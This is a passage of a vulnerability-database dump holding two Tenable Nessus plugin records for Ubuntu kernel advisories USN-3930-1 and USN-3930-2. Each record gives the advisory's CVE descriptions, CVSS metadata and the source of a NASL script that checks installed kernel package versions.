NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-03T00:00:00", "title": "Ubuntu 18.04 LTS : linux-hwe, linux-azure vulnerabilities (USN-3930-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic"], "id": "UBUNTU_USN-3930-2.NASL", "href": "https://www.tenable.com/plugins/nessus/123677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3930-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123677);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/27\");\n\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_xref(name:\"USN\", value:\"3930-2\");\n\n script_name(english:\"Ubuntu 18.04 LTS : linux-hwe, linux-azure vulnerabilities (USN-3930-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3930-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3930-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8956\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3930-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-1014-azure\", pkgver:\"4.18.0-1014.14~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-generic\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-generic-lpae\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-lowlatency\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-snapdragon\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-azure\", pkgver:\"4.18.0.1014.13\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-virtual-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.18-azure / linux-image-4.18-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:34:40", "description": "Mathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-03T00:00:00", "title": "Ubuntu 18.10 : linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-raspi2 (USN-3930-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-raspi2", "cpe:/o:canonical:ubuntu_linux:18.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-3930-1.NASL", "href": "https://www.tenable.com/plugins/nessus/123676", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3930-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123676);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/27\");\n\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_xref(name:\"USN\", value:\"3930-1\");\n\n script_name(english:\"Ubuntu 18.10 : linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-raspi2 (USN-3930-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3930-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8956\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3930-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1008-gcp\", pkgver:\"4.18.0-1008.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1009-kvm\", pkgver:\"4.18.0-1009.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1011-raspi2\", pkgver:\"4.18.0-1011.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1012-aws\", pkgver:\"4.18.0-1012.14\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1014-azure\", pkgver:\"4.18.0-1014.14\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-generic\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-generic-lpae\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-lowlatency\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-snapdragon\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-aws\", pkgver:\"4.18.0.1012.12\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-azure\", pkgver:\"4.18.0.1014.15\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-gcp\", pkgver:\"4.18.0.1008.8\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-generic\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.18.0.17.18\")) flag++;\nif 